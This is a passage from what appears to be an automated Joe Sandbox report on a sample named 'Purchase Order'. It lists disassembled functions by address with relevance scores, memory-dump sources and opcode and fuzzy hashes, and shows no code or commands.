                                                            • API ID:
                                                            • String ID: BinaryName
                                                            • API String ID: 0-215506332
                                                            • Opcode ID: 4bc75477911ca0ffa2e880fda44d85cf226a711069af5c19de6adb9248bda811
                                                            • Instruction ID: fb383a148a3904d5206050df1b67ced48e49bc2fe9a6719b969c5767bb9e9a75
                                                            • Opcode Fuzzy Hash: 4bc75477911ca0ffa2e880fda44d85cf226a711069af5c19de6adb9248bda811
                                                            • Instruction Fuzzy Hash: D031E17690061AAFEB16DA5DC845E6FBB74EB80724F01412DE905E7251D730EF04EBE1
                                                            Function 018E892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 018E895E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                            • API String ID: 0-702105204
                                                            • Opcode ID: 386c40cda5d04078dae73627ae14c394f046b76a6c8f32a90e5cc02ef2237fbd
                                                            • Instruction ID: 0989e477d0500081fd283431be345f0db26a769b4ab4512b6b7c6c75607b77dd
                                                            • Opcode Fuzzy Hash: 386c40cda5d04078dae73627ae14c394f046b76a6c8f32a90e5cc02ef2237fbd
                                                            • Instruction Fuzzy Hash: 6C01F732A043059BF731BA59988CA5E7FE5EF93394B05001CF641A7152CB60AE41C793
                                                            Function 01902000 Relevance: .8, Instructions: 757COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1c70d683937f56a20afa5e5c2676956cd7a5af2ee70324df5d30cbeb99277e58
                                                            • Instruction ID: 6524af82cff49c64bff7b52b0add9c6e61bc35977e7c1825d55b61a482fa2c33
                                                            • Opcode Fuzzy Hash: 1c70d683937f56a20afa5e5c2676956cd7a5af2ee70324df5d30cbeb99277e58
                                                            • Instruction Fuzzy Hash: 8642E6356083419FE726CF68C894A6BBBE9BF84700F18092DFA8AD7290D771D945CB53
                                                            Function 018F8158 Relevance: .6, Instructions: 617COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77a60a74b47e20a562f635b4f39068b7d41310bec646c7fc43f51792125621fb
                                                            • Instruction ID: dfe124eaeca5c0bfad80d3b39c7e5a3c44fcdc152b38de1f22b3616c2c38acbd
                                                            • Opcode Fuzzy Hash: 77a60a74b47e20a562f635b4f39068b7d41310bec646c7fc43f51792125621fb
                                                            • Instruction Fuzzy Hash: C4425E75E102198FEB24CF69C881BADBBF5BF49300F14809DEA49EB252D7349A85CF51
                                                            Function 01872840 Relevance: .6, Instructions: 605COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 499b311ab8f6cb1580c462f04cc5790ae3b8108eef7d3ba3257582e3a6099689
                                                            • Instruction ID: cc22b61de2947f5a39438cc99812e4f083b55aefe4d02698e9b743b3e3025478
                                                            • Opcode Fuzzy Hash: 499b311ab8f6cb1580c462f04cc5790ae3b8108eef7d3ba3257582e3a6099689
                                                            • Instruction Fuzzy Hash: DD32DF70A047598BDB25CF69C844BBABBF2BF84B04F24412DD58ADB385E735EA41CB50
                                                            Function 0190A118 Relevance: .6, Instructions: 591COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a780b6b4dc346d2ca6af9337a78e9c2f5d6d58252ae508d86b5526e7a0c497f4
                                                            • Instruction ID: e6a4284ac44b5d12452bca429d052b99473d0ee5a408c5bb9ba28e0417f5a383
                                                            • Opcode Fuzzy Hash: a780b6b4dc346d2ca6af9337a78e9c2f5d6d58252ae508d86b5526e7a0c497f4
                                                            • Instruction Fuzzy Hash: 0622BC746047618FEB26CF2DC490776BBF5BF44341F08895AD98A8B2C6D335E492DBA0
                                                            Function 01888DBF Relevance: .6, Instructions: 554COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 33a9228f2dec0fde69c94fbd1a0356ccf525a103e58926d338952396bfab6cd1
                                                            • Instruction ID: 6d10492d8500648ab086384939a831c1f921ebf01d4517f28f0c5165ba673929
                                                            • Opcode Fuzzy Hash: 33a9228f2dec0fde69c94fbd1a0356ccf525a103e58926d338952396bfab6cd1
                                                            • Instruction Fuzzy Hash: A1226E70E0011ADBDB15DF99C4809BEFBF2BF85704B54816AE945EB241E734EE42DBA0
                                                            Function 01866A50 Relevance: .5, Instructions: 548COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cebdbfd43f66bf30465b95c848c705ea2168212f3f04c88bb0c5100a24e606ae
                                                            • Instruction ID: 42860d01c8433d8e555979df2be77f91cbbe661f5d6ff4bed0ca820c235958ee
                                                            • Opcode Fuzzy Hash: cebdbfd43f66bf30465b95c848c705ea2168212f3f04c88bb0c5100a24e606ae
                                                            • Instruction Fuzzy Hash: 6C32AF71A00645CFDB25CF68C480BAABBF6FF48304F248569E955EB352E734EA41CB90
                                                            Function 01884A35 Relevance: .4, Instructions: 423COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                            • Instruction ID: 8e3d0827bedad42304d9d96a7e7fe29d5b0361dc4b381552b64d112d1119ac7c
                                                            • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                            • Instruction Fuzzy Hash: 99F17E72E0061B9BDB15DFA9C580BAEBBF6AF48754F04812DE905EB341E734DA41CB60
                                                            Function 018F892B Relevance: .4, Instructions: 386COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6678162985943c62d937f6a07c799a0d5ba6676ad1df3b8d579636574a660ca1
                                                            • Instruction ID: 2ccab9a122ce256405793d6fd827089a78cf3cc38e298ad82594a606e1e85e6d
                                                            • Opcode Fuzzy Hash: 6678162985943c62d937f6a07c799a0d5ba6676ad1df3b8d579636574a660ca1
                                                            • Instruction Fuzzy Hash: F9D1D071A0060A9FDF15CF69C841BBEB7F1AF89304F18816DDA55E7241E735EA06CB60
                                                            Function 018665D0 Relevance: .4, Instructions: 383COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c89dd71d7c2ac4ebdd1f9b83aab1de2171ed8f41f815219a18f3d563ccbeb8a7
                                                            • Instruction ID: 9ab983120abb054cf1fa2ea388f0fc89443ae107373d1fcbac60b570d92996b0
                                                            • Opcode Fuzzy Hash: c89dd71d7c2ac4ebdd1f9b83aab1de2171ed8f41f815219a18f3d563ccbeb8a7
                                                            • Instruction Fuzzy Hash: 64E18071508382CFC715CF28C190A6ABBE5FF89318F158A6DE995C7351EB31EA05CB92
                                                            Function 01858397 Relevance: .4, Instructions: 380COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5a86557411930529a6aac0a656f7a7c059e1d2215564d55f1d16b77193a88243
                                                            • Instruction ID: 471146effc5cde122c86df53803e923a7a5d256014f2bffe572bf12bec92fa60
                                                            • Opcode Fuzzy Hash: 5a86557411930529a6aac0a656f7a7c059e1d2215564d55f1d16b77193a88243
                                                            • Instruction Fuzzy Hash: A2D1E371A0020ADBDB54DF6AC8C0ABA77A5FF56308F04462EED16DB281E730EB55CB51
                                                            Function 018E8243 Relevance: .3, Instructions: 322COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                            • Instruction ID: 0ab5b37084b9a6bd523545f5bf1f1fd1bcd20344c2fbd5edaccf6411e31482ff
                                                            • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                            • Instruction Fuzzy Hash: CDB17274A00609AFDF24DF99C948AAFBBF9FF86304F14445DAA02D7791DA74EA05CB10
                                                            Function 01870535 Relevance: .3, Instructions: 300COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                            • Instruction ID: 9d9e63b663a24cf059fa8bb1d174adf570495566168f04445a1af18c04817574
                                                            • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                            • Instruction Fuzzy Hash: 55B1063160464AAFDB25CBA8C850BBEBBF6AF85704F140159E656EB281D730EF81CB51
                                                            Function 018683C0 Relevance: .3, Instructions: 281COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 90f10ca645c28eed45449710782453cdd1597bbb4f8341eef5305a0b98c2eeb3
                                                            • Instruction ID: 69e76627564a7a2e84b96441477d55a3a477c139a343d27a6dc4936b5af5433c
                                                            • Opcode Fuzzy Hash: 90f10ca645c28eed45449710782453cdd1597bbb4f8341eef5305a0b98c2eeb3
                                                            • Instruction Fuzzy Hash: 69C14974508341CFE764CF19C498BAAB7E9BF88704F44495DE989C7291E774EA08CF92
                                                            Function 0185C427 Relevance: .3, Instructions: 280COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 03ef6c3e3353a4010227d0d807c4395b0882b1aff0c88f777af014aca7221692
                                                            • Instruction ID: dc7e93df3f843a46506b67165ec176eff632e542ef495afd50e0ce0527ba31c0
                                                            • Opcode Fuzzy Hash: 03ef6c3e3353a4010227d0d807c4395b0882b1aff0c88f777af014aca7221692
                                                            • Instruction Fuzzy Hash: BDB16370A002658BDB65DF58C890BA9B7F5FF44744F0485E9E90AEB241EB709E86CF21
                                                            Function 0188E5E7 Relevance: .3, Instructions: 278COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ffdf2ca45fadf4540c1d5a25a63670591d13579a05896b4308bc6458dc698ed3
                                                            • Instruction ID: 6fd747d8c338990a2e1991f5864d155b6878427359124543aad990ead92f8c91
                                                            • Opcode Fuzzy Hash: ffdf2ca45fadf4540c1d5a25a63670591d13579a05896b4308bc6458dc698ed3
                                                            • Instruction Fuzzy Hash: 05A1E731E006599FFB21EB5CC844BADBBA5AF01B18F054115EB11E7291D774DF40CB91
                                                            Function 018A0185 Relevance: .3, Instructions: 276COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc1f954773cbc0259cee1ea1ad8abbe569166eda453068f83eb21c1f9ad08b0c
                                                            • Instruction ID: 75e06ba19e576326b14e58cc07be62e00b93aaf7600e5cae08ed2c73adbc0a6c
                                                            • Opcode Fuzzy Hash: fc1f954773cbc0259cee1ea1ad8abbe569166eda453068f83eb21c1f9ad08b0c
                                                            • Instruction Fuzzy Hash: 9EA1C470B0171A9FEB25DF69D890BAAB7B1FF54318F444029FA45D7281EB34EA11CB50
                                                            Function 01934500 Relevance: .3, Instructions: 275COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4b6f34d3b63dc7b13eb851c3fd5607992108d6b5e765ff19fc20d62309656e75
                                                            • Instruction ID: 519eaed8ee607b3f2b4b69a33dd16171707734770a2fd27130bb1bf51c72f3a0
                                                            • Opcode Fuzzy Hash: 4b6f34d3b63dc7b13eb851c3fd5607992108d6b5e765ff19fc20d62309656e75
                                                            • Instruction Fuzzy Hash: 24A1AE72A04612DFD722DF28C980F5ABBE9FF88745F460A28E549DB651D334ED01CB92
                                                            Function 018E60E0 Relevance: .3, Instructions: 264COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 03f31e5fda969a0d1a49333f4f7ac4a29cfe4b14da053dec36cfa882637b9eed
                                                            • Instruction ID: 3655b8f1db50a6a962edf5c21f28a1a66a17cdae5f441a2128c48458a2096417
                                                            • Opcode Fuzzy Hash: 03f31e5fda969a0d1a49333f4f7ac4a29cfe4b14da053dec36cfa882637b9eed
                                                            • Instruction Fuzzy Hash: 75917371D0021AAFDB15DF68D888BAEBFF5AF5A710F254159E610EB241E734DB009BA0
                                                            Function 0187E3F0 Relevance: .3, Instructions: 261COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 19be7a05876e3bae3429e2237513546f853bf834c8f40198571d89e863eb1db2
                                                            • Instruction ID: 815ac2a7d3a80f0bb8c5e8eb6ac7c54f72f55b3588a46bfd4514eb22ffc8deb2
                                                            • Opcode Fuzzy Hash: 19be7a05876e3bae3429e2237513546f853bf834c8f40198571d89e863eb1db2
                                                            • Instruction Fuzzy Hash: 7291F571E0061ACBEB24DB6DC484BBABBA1FF94B18F0541E9ED05EB241E634DB41C752
                                                            Function 018B6ACC Relevance: .2, Instructions: 226COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0063dea5a65bec4e857e5f0b207fa3528790c35fd388aa6a4fcaba03b31a546f
                                                            • Instruction ID: f910a5f3b054e68d7030591bba6711046c946d5b713280c1f9cf760c6b821e88
                                                            • Opcode Fuzzy Hash: 0063dea5a65bec4e857e5f0b207fa3528790c35fd388aa6a4fcaba03b31a546f
                                                            • Instruction Fuzzy Hash: A9817271A0061A9BDB24CF69C990AFEBBF9FB48700F14852EE555E7740E334EA40CB94
                                                            Function 0192AB40 Relevance: .2, Instructions: 222COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                            • Instruction ID: 583827d9ed3805788d315156ee3d52a0a108c231078c3f15a7514e430e210a1c
                                                            • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                            • Instruction Fuzzy Hash: 60818332A002169FDF19CF59C480AAEBBF6FF84311F188569D91A9B789D734EA05CB50
                                                            Function 0189E284 Relevance: .2, Instructions: 212COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 62658ec4c512ddbc3a82739751d0b381a354dd4d521cb594ef1f160ba6ca8294
                                                            • Instruction ID: 8a7d05b436fc123cb73b3596f0dd41a1888ef47ca8a0ce2ed8d91b030555c7a6
                                                            • Opcode Fuzzy Hash: 62658ec4c512ddbc3a82739751d0b381a354dd4d521cb594ef1f160ba6ca8294
                                                            • Instruction Fuzzy Hash: ED814F71A00609AFDB25CFA9C880AEEBBBAFF88354F144429E555E7250D730AE45DB60
                                                            Function 0187C640 Relevance: .2, Instructions: 206COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7dfaf7fe585dc1336ebc1285ebf0f827851c3c07a0d5a79cbd23dc90034ca647
                                                            • Instruction ID: f0d4055ba5db48ffbc6920e7bef0e5244b29906a7576e96dba9ac5250b2bff7c
                                                            • Opcode Fuzzy Hash: 7dfaf7fe585dc1336ebc1285ebf0f827851c3c07a0d5a79cbd23dc90034ca647
                                                            • Instruction Fuzzy Hash: F571BCB580462ADBCB25CF59D8907BEBBB0FF59B10F14411EE942EB350E7349A00CBA0
                                                            Function 019147A0 Relevance: .2, Instructions: 202COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 78adedb0dc756b4f8e493d967f7ad1f85b7b21772799e4c02862750a57d8f4e4
                                                            • Instruction ID: 1660d2863c4b8f7c83c77d97ae698783d75d3ba77e36ef31fcb616aca955f151
                                                            • Opcode Fuzzy Hash: 78adedb0dc756b4f8e493d967f7ad1f85b7b21772799e4c02862750a57d8f4e4
                                                            • Instruction Fuzzy Hash: DC719171904309EFEB20CF99D940A9ABBF9FF98701F55465AE608EB25CC7318980CF54
                                                            Function 0187260B Relevance: .2, Instructions: 201COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7cd0c98beef1f8041738b799f6ecc997d27bb437ce0f233d91056d528b06aaf6
                                                            • Instruction ID: f50e81fae6aa52408ba7d0c0342b196139831a2161854e8e523bfc6231b048f7
                                                            • Opcode Fuzzy Hash: 7cd0c98beef1f8041738b799f6ecc997d27bb437ce0f233d91056d528b06aaf6
                                                            • Instruction Fuzzy Hash: EA71C1356042428FD311DF2CC480B2AF7E6FF84714F0485AAE899CB356EB34DA85CB92
                                                            Function 018E035C Relevance: .2, Instructions: 198COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                            • Instruction ID: f2bb27e97a0e5acb244eeea31e0b7f5eb8bc4d6a7fb48bcd7b0e92f86dfd39f8
                                                            • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                            • Instruction Fuzzy Hash: 63716D71A0060AEFDB10DFA9C984A9EBBF8FF98700F144969E905E7250DB74EA01CB51
                                                            Function 018F62A0 Relevance: .2, Instructions: 198COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 598a2b18bb3e121e2495d317c9a4efcdcf6d545f9c1c42b4b433c339cbd79678
                                                            • Instruction ID: 6d74be8f1b5b3483632c7ae80a4fb658b3d2c766ad5370a95802c48fe992af99
                                                            • Opcode Fuzzy Hash: 598a2b18bb3e121e2495d317c9a4efcdcf6d545f9c1c42b4b433c339cbd79678
                                                            • Instruction Fuzzy Hash: B371D132200701AFE7329F18C884F56BBA6EF50724F244A1CE755D76A1E775EA44CB51
                                                            Function 01868AA0 Relevance: .2, Instructions: 197COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dd12bbe818f5864ead6eeb75cc44824deabea800f594e1a518ce4b65a698b459
                                                            • Instruction ID: 4a5ed0b8dd77c0c712b017d4da307efff3c5bfd02834ac460e609a40015f62e9
                                                            • Opcode Fuzzy Hash: dd12bbe818f5864ead6eeb75cc44824deabea800f594e1a518ce4b65a698b459
                                                            • Instruction Fuzzy Hash: 8281AB72A083168FDB24CF9CD484BADB7B6BB89714F15412DDA04EB291D774DE81CB90
                                                            Function 0189CDB1 Relevance: .2, Instructions: 197COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 12131d352b6f9f48eb1f2b985eeb9f4003d480b128054350d775b93f3de39b31
                                                            • Instruction ID: 20f000770e3eaf2dc477b29ebdc3317a054fed532dbe5eb2820eb1257d095dea
                                                            • Opcode Fuzzy Hash: 12131d352b6f9f48eb1f2b985eeb9f4003d480b128054350d775b93f3de39b31
                                                            • Instruction Fuzzy Hash: 2061A071A0020AEFDF19DF6CC880AAEB7B5FF49314F154569E612EB291DB31DA01CB52
                                                            Function 0191A250 Relevance: .2, Instructions: 184COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8e24d39e11745c706a90d6d758c0c4b0559102120f3cf98451877bb1f34fe778
                                                            • Instruction ID: e877875796f580b02a04a342eb1e422fa72f3e2cab297557c028a4087bd3913d
                                                            • Opcode Fuzzy Hash: 8e24d39e11745c706a90d6d758c0c4b0559102120f3cf98451877bb1f34fe778
                                                            • Instruction Fuzzy Hash: 4451F17250674AAFD712DE68C844F5BB7E8EBC5B10F000929BA48DB194D770EE45C7A3
                                                            Function 01908350 Relevance: .2, Instructions: 161COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.1835504450.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_1830000_Purchase Order.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
